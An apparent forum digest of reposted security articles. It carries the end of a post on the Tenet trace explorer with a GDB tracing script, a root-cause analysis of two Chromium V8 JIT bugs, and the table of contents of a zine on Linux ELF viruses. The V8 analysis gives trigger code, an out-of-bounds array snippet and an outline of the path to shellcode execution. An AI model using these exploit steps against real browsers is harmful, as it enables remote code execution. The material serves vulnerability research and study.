Without funding, the time I can devote to this project is limited. If your organization is excited by the ideas put forth here and capable of providing capital to sponsor dedicated development time towards Tenet, please contact us.

Related Works

There aren't many robust projects (or products) in this space, and it's important to raise awareness for the few that exist. If you found this blogpost interesting, please consider exploring and supporting more of these technologies:

QIRA – QEMU Interactive Runtime Analyser
Microsoft TTD – Time Travel Debugging for Windows
RR // Pernosco – Timeless debugging for Linux
PANDA – Full system tracing, built on QEMU
REVEN – Full system tracing, built on PANDA / VirtualBox
UndoDB – Reversible debugging for Linux and Android
DejaVM – :^)

Conclusion

In this post, we presented a new IDA Pro plugin called Tenet. It is an experimental plugin designed to explore software execution traces. It can be used both as an aid in the reverse engineering process and as a research technology to explore new ideas in program analysis, visualization, and the efficacy of next-generation debugging experiences.

Our experience developing for these technologies is second to none. RET2 is happy to consult in these spaces, providing plugin development services, the addition of custom features to existing works, or other unique opportunities with regard to security tooling. If your organization has a need for this expertise, please feel free to reach out.

Sursa: https://blog.ret2.io/2021/04/20/tenet-trace-explorer/
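Tenet consumes externally-collected, human-readable text traces; the tracing readme mentioned above documents the exact per-line format and ships the official reference tracers. Purely as an illustration of the kind of data involved, here is a minimal, hypothetical sketch using GDB's Python API that single-steps a target and logs one line of register state per executed instruction. It is not one of Tenet's reference tracers, and the "reg=value" line format below is an assumption for demonstration only.

# tracer.py - run with: gdb -q -x tracer.py ./target   (./target is a placeholder)
# Minimal single-stepping register tracer sketch; illustrative, very slow.
import gdb

REGS = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp", "rip"]

def collect_trace(outfile="trace.log", max_steps=200000):
    gdb.execute("starti", to_string=True)  # stop at the program's first instruction
    with open(outfile, "w") as out:
        for _ in range(max_steps):
            try:
                # One comma-separated register snapshot per executed instruction.
                line = ",".join(
                    "%s=%#x" % (reg, int(gdb.parse_and_eval("$" + reg)) & (2**64 - 1))
                    for reg in REGS
                )
                out.write(line + "\n")
                gdb.execute("stepi", to_string=True)
            except gdb.error:
                # The inferior exited (or a register read failed); stop tracing.
                break

collect_trace()

The resulting text file would still need to be converted to whatever syntax the trace explorer expects; for real workloads, the reference tracers linked from the Tenet repository are the better starting point.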
22. Analysis of Chromium issue 1196683, 1195777

Apr 20, 2021 • iamelli0t

On April 12, a code commit[1] in Chromium got people's attention. It is a bugfix for a vulnerability in Chromium's JavaScript engine, v8. At the same time, the regression test case regress-1196683.js for this bugfix was also submitted. Based on this regression test case, a security researcher published an exploit sample[2]. Due to the Chrome release pipeline, the vulnerability was not fixed in a Chrome stable update until April 13[3].

Coincidentally, on April 15, another bugfix commit[4] in v8 also included a regression test case, regress-1195777.js. Based on this test case, an exploit sample was exposed again[5]. Since the latest Chrome stable version does not include this bugfix commit, the sample can still be used to exploit the renderer process of the latest Chrome. When the vulnerable Chromium browser accesses a malicious link with the sandbox disabled (--no-sandbox), the vulnerability is triggered and causes remote code execution.

RCA of Issue 1196683

The bugfix for this issue is shown as follows:

This commit fixes the issue of incorrect instruction selection for the ChangeInt32ToInt64 node in the instruction selection phase of v8 TurboFan. Before the commit, instruction selection was done according to the input node type of the ChangeInt32ToInt64 node: if the input node type is a signed integer, the X64Movsxlq instruction is selected for sign extension, otherwise X64Movl is selected for zero extension. After the bugfix, X64Movsxlq is selected for sign extension regardless of the input node type.

First, let's analyze the root cause of this vulnerability via regress-1196683.js:

(function() {
  const arr = new Uint32Array([2**31]);
  function foo() {
    return (arr[0] ^ 0) + 1;
  }
  %PrepareFunctionForOptimization(foo);
  assertEquals(-(2**31) + 1, foo());
  %OptimizeFunctionOnNextCall(foo);
  assertEquals(-(2**31) + 1, foo());
});

The foo function that triggers JIT compilation has only one line of code. Let's focus on the optimization process of (arr[0] ^ 0) + 1 in the key phases of TurboFan:

1) TyperPhase

The XOR operator corresponds to node 32, and its two inputs are the constant 0 (node 24) and arr[0] (node 80).

2) SimplifiedLoweringPhase

The original node 32 (SpeculativeNumberBitwiseXor) is optimized to Word32Xor, and the successor node ChangeInt32ToInt64 is added after Word32Xor. At this point, the input node (Word32Xor) type of ChangeInt32ToInt64 is Signed32.

3) EarlyOptimizationPhase

We can see that the original node 32 (Word32Xor) has been deleted and replaced with node 80 as the input of node 110 (ChangeInt32ToInt64). Now the input node (LoadTypedElement) type of ChangeInt32ToInt64 is Unsigned32.
The v8 code corresponding to this logic is as follows:

template <typename WordNAdapter>
Reduction MachineOperatorReducer::ReduceWordNXor(Node* node) {
  using A = WordNAdapter;
  A a(this);

  typename A::IntNBinopMatcher m(node);
  if (m.right().Is(0)) return Replace(m.left().node());  // x ^ 0 => x
  if (m.IsFoldable()) {  // K ^ K => K  (K stands for arbitrary constants)
    return a.ReplaceIntN(m.left().ResolvedValue() ^ m.right().ResolvedValue());
  }
  if (m.LeftEqualsRight()) return ReplaceInt32(0);  // x ^ x => 0
  if (A::IsWordNXor(m.left()) && m.right().Is(-1)) {
    typename A::IntNBinopMatcher mleft(m.left().node());
    if (mleft.right().Is(-1)) {  // (x ^ -1) ^ -1 => x
      return Replace(mleft.left().node());
    }
  }

  return a.TryMatchWordNRor(node);
}

As the code above shows, for the case x ^ 0 => x, the left node is used to replace the current node, which introduces the wrong data type.

4) InstructionSelectionPhase

According to the previous analysis, in the instruction selection phase, because the input node (LoadTypedElement) type of ChangeInt32ToInt64 is Unsigned32, the X64Movl instruction is finally selected to replace the ChangeInt32ToInt64 node:

Because the zero-extending instruction X64Movl is selected incorrectly, (arr[0] ^ 0) returns the wrong value: 0x0000000080000000.

Finally, using this vulnerability, a variable x with an unexpected value of 1 in JIT code can be obtained via the following code (the expected value should be 0):

const _arr = new Uint32Array([0x80000000]);
function foo() {
  var x = (_arr[0] ^ 0) + 1;
  x = Math.abs(x);
  x -= 0x7fffffff;
  x = Math.max(x, 0);
  x -= 1;
  if (x == -1) x = 0;
  return x;
}

RCA of Issue 1195777

The bugfix for this issue is shown as follows:

This commit fixes an error in the generation of the integer conversion node used to convert a 64-bit integer to a 32-bit integer (truncation) in the SimplifiedLowering phase. Before the commit, if the output type of the current node is Signed32 or Unsigned32, a TruncateInt64ToInt32 node is generated. After the commit, if the output type of the current node is Unsigned32, the type of use_info also needs to be checked: only when use_info.type_check() == TypeCheckKind::kNone will the TruncateInt64ToInt32 node be generated.

First, let's analyze the root cause of this vulnerability via regress-1195777.js:

(function() {
  function foo(b) {
    let x = -1;
    if (b) x = 0xFFFFFFFF;
    return -1 < Math.max(0, x, -1);
  }
  assertTrue(foo(true));
  %PrepareFunctionForOptimization(foo);
  assertTrue(foo(false));
  %OptimizeFunctionOnNextCall(foo);
  assertTrue(foo(true));
})();

The key code in the foo function that triggers JIT compilation is 'return -1 < Math.max(0, x, -1)'. Let's focus on the optimization process of Math.max(0, x, -1) in the key phases of TurboFan:

1) TyperPhase

Math.max(0, x, -1) corresponds to node 56 and node 58. The output of node 58 is used as the input of node 41: SpeculativeNumberLessThan (<).

2) TypedLoweringPhase

The two constant parameters 0 and -1 (node 54 and node 55) in Math.max(0, x, -1) are replaced with constant node 32 and node 14.

3) SimplifiedLoweringPhase

The original NumberMax nodes 56 and 58 are replaced by Int64LessThan + Select nodes. The original node 41 (SpeculativeNumberLessThan) is replaced with Int32LessThan. When processing the input node of SpeculativeNumberLessThan, because the output type of the input node (Select) is Unsigned32, the vulnerability is triggered and node 76 (TruncateInt64ToInt32) is generated incorrectly. The result of Math.max(0, x, -1) is truncated to Signed32.
Therefore, when the x in Math.max(0, x, -1) is Unsigned32, it will be truncated to Signed32 by TruncateInt64ToInt32. Finally, using this vulnerability, a variable x with an unexpected value of 1 in JIT code can be obtained via the following code (the expected value should be 0):

function foo(flag) {
  let x = -1;
  if (flag) {
    x = 0xFFFFFFFF;
  }
  x = Math.sign(0 - Math.max(0, x, -1));
  return x;
}

Exploit analysis

According to the above root cause analysis, we can see that both vulnerabilities are triggered when TurboFan performs integer data type conversion (extension, truncation). Using either of the two vulnerabilities, a variable x with an unexpected value of 1 in JIT code can be obtained. According to the samples exploited in the wild, the exploit follows the steps below:

1) Create an Array whose length is 1 with the help of the variable x that holds the erroneous value 1;

2) Obtain an out-of-bounds array with length 0xFFFFFFFF through Array.prototype.shift();

The key code is shown as follows:

var arr = new Array(x); // wrong: x = 1
arr.shift(); // oob
var cor = [1.8010758439469018e-226, 4.6672617056762661e-62, 1.1945305861211498e+103];
return [arr, cor];

The JIT code of var arr = new Array(x) is:

Rdi is the length of arr, whose value is 1. It is shifted left by one bit (rdi+rdi) because of pointer compression and stored in the JSArray.length property (+0xC).

The JIT code of arr.shift() is:

After arr.shift(), the length of arr is assigned the constant 0xFFFFFFFE directly. The optimization process is shown as follows:

(1) TyperPhase

The array length assignment operation is mainly composed of node 152 and node 153. Node 152 calculates Array.length - 1. Node 153 saves the calculation result in Array.length (+0xC).

(2) LoadEliminationPhase

Since the value of x collected by Ignition is 0, constant folding (0 - 1 = -1) happens here to get the constant 0xFFFFFFFF. After shifting left by one bit, it is 0xFFFFFFFE, which is stored in Array.length (+0xC). Thus, an out-of-bounds array with a length of 0xFFFFFFFF is obtained.

After the out-of-bounds array is obtained, the next steps are common:

3) Realize addrof/fakeobj with the help of this out-of-bounds array;

4) Fake a JSArray to achieve an arbitrary memory read/write primitive with the help of addrof/fakeobj;

The memory layout of arr and cor in the exploit sample is:

(1) Use the vulnerability to obtain an arr with the length of 0xFFFFFFFF (red box)
(2) Use the out-of-bounds arr and cor to achieve addrof/fakeobj (green box)
(3) Use the out-of-bounds arr to modify the length of cor (yellow box)
(4) Use the out-of-bounds cor, leak the map and properties of cor (blue box), fake a JSArray, and use this fake JSArray to achieve an arbitrary memory read/write primitive

5) Execute shellcode with the help of WebAssembly;

Finally, a memory page with RWX attributes is created with the help of WebAssembly. The shellcode is copied to that memory page and executed in the end.

The exploitation screenshot:

References

[1] https://chromium-review.googlesource.com/c/v8/v8/+/2820971
[2] https://github.com/r4j0x00/exploits/blob/master/chrome-0day/exploit.js
[3] https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html
[4] https://chromium-review.googlesource.com/c/v8/v8/+/2826114
[5] https://github.com/r4j0x00/exploits/blob/master/chrome-0day/exploit.js

Sursa: https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html
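To make the sign/zero-extension mistake behind issue 1196683 concrete, here is a small worked model of the arithmetic only (a Python sketch, not v8 code): it evaluates arr[0] ^ 0 once the way the unoptimized code sees it (sign-extended Signed32) and once the way the mis-selected X64Movl leaves it (zero-extended), then pushes both through the arithmetic chain of the exploit's foo() shown above.

def sign_extend_32(v):
    # What X64Movsxlq does when widening a Signed32 value to 64 bits.
    return v - 2**32 if v & 0x80000000 else v

def zero_extend_32(v):
    # What the mis-selected X64Movl does: the high bit is not propagated.
    return v & 0xFFFFFFFF

def chain(x):
    # The arithmetic chain from the exploit's foo().
    x = x + 1
    x = abs(x)
    x -= 0x7fffffff
    x = max(x, 0)
    x -= 1
    if x == -1:
        x = 0
    return x

elem = 0x80000000                       # arr[0] of the Uint32Array
print(chain(sign_extend_32(elem ^ 0)))  # 0 -> value the unoptimized code computes
print(chain(zero_extend_32(elem ^ 0)))  # 1 -> value the mis-optimized JIT code computes

The runtime value 1, in a place where TurboFan believes the result can only be 0, is exactly the mismatch the exploit then feeds into new Array(x) and Array.prototype.shift() to obtain the 0xFFFFFFFF length described above.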
23. tmp.0ut
tmp.0ut Volume 1 - April 2021

CONTENTS

1.0  Intro ....................................................... tmp.0ut Staff
1.1  Dead Bytes .................................................... xcellerator
1.2  Implementing the PT_NOTE Infection Method In x64 Assembly ........... sblip
1.3  PT_NOTE To PT_LOAD ELF Injector In Rust ............................. d3npa
1.4  PT_NOTE Disinfector In Python .................................... manizzle
1.5  Fuzzing Radare2 For 0days In About 30 Lines Of Code ..... Architect, s01den
1.6  The Polymorphic False-Disassembly Technique ........................ s01den
1.7  Lin64.Eng3ls: Some Anti-RE Techniques In A Linux Virus ...... s01den, sblip
1.8  Linux.Midrashim.asm ................................................... TMZ
1.9  In-Memory LKM Loading ........................................... netspooky
1.10 Linux SHELF Loading .................................... ulexec, Anonymous_
1.11 Return To Original Entry Point Despite PIE ......................... s01den
1.12 Writing Viruses In MIPS Assembly For Fun (And No Profit) ........... s01den
1.13 Interview: herm1t ........................................... tmp.0ut Staff
1.14 GONE IN 360 SECONDS - Linux/Retaliation ............................ qkumba
1.15 Linux.Nasty.asm ....................................................... TMZ
1.16 Linux.Precinct3.asm ............................................. netspooky
1.17 Underground Worlds ................................................. s01den

>> For the txt version of this zine, visit https://tmpout.sh/1/txt/index.txt (all .html files are renamed to .txt!) or download the zip of this zine here: https://tmpout.sh/1/tmp.0ut.1.txt.zip

Sursa: https://tmpout.sh/1/